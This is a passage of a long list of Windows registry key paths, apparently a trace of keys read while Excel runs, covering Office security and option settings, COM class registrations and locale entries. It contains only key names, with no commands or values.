HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InitFolderHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.FileTypeAssociation\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ExePath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\CommandLine
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\IdentityType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ActivatableClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ServerType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\AppId
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\Identity
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ServiceName
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\StateRepository\ExplicitPsmActivationType
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{8645456F-D9A2-4B82-AFEC-58F0E8DF0ACF}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-100000000000}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{70ce53cd-0000-0000-0000-100000000000}\Generation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{89BC3F49-F8D9-5103-BA13-DE497E609167}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\SystemPropertyHandlers\.xls
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.xls\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\NoOplock
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InProcServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableROForSharedDocs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SupportUNCMappedDriveSaveAs
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline\Options\CheckoutToDraftsEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableIntranetCheck
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachmentsInPV
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\a,k
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\DisableStructuredStorageSharedMemoryMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableLogUnsupportedFeaturesToAppStorage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RevisionTrimSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultSheetR2L
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\A4Letter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CursorVisual
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ControlCharacters
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultFormat
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\VbaOff
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\VbaOff
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutomaticPictureCompressionDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DiscardImageEdits
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultImageDPI
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Saskatchewan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Honshu
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\AllLocationsDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\BlockFQDNFileProtocol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\DisableNetworkTrustedDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\FileValidation\EnableLogging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ExtensionHardening
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\OoxmlConverterBlockList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock\XL97WorkbooksandTemplates
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FontSub
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockContentExecutionFromInternet
HKEY_CURRENT_USER\Control Panel\International\User Profile\en-US\TransientLangId
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\aa-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\aa-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\aa-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\aa-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\aa-ET
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\aa-ET
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\af-NA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\af-NA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\agq
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\agq
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\agq-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\agq-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ak
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ak
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ak-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ak-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-KM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-KM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-PS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-PS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-TD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-TD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\asa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\asa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\asa-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\asa-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ast
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ast
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ast-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ast-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bas
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bas
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bas-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bas-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bem
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bem
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bem-ZM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bem-ZM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bez
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bez
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bez-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bez-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bm-Latn-ML
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bm-Latn-ML
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bm-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bm-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bo-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bo-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\brx
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\brx
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\brx-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\brx-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\byn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\byn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\byn-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\byn-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca-AD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca-AD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ca-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ca-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ccp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ccp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ccp-Cakm-BD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ccp-Cakm-BD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ccp-Cakm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ccp-Cakm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ccp-Cakm-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ccp-Cakm-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ce
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ce
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ce-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ce-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ceb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ceb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ceb-Latn-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ceb-Latn-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ceb-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ceb-Latn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cgg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cgg
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cgg-UG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cgg-UG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cu-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cu-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\da-GL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\da-GL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dav
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dav
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dav-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dav-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dje
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dje
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dje-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dje-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\doi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\doi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\doi-Deva-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\doi-Deva-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\doi-Deva
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\doi-Deva
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dua
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dua
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dua-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dua-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dyo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dyo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dyo-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dyo-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ebu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ebu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ebu-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ebu-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ee
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ee
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ee-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ee-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ee-TG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ee-TG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\el-CY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\el-CY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-150
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-150
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-BW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-BW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-DK
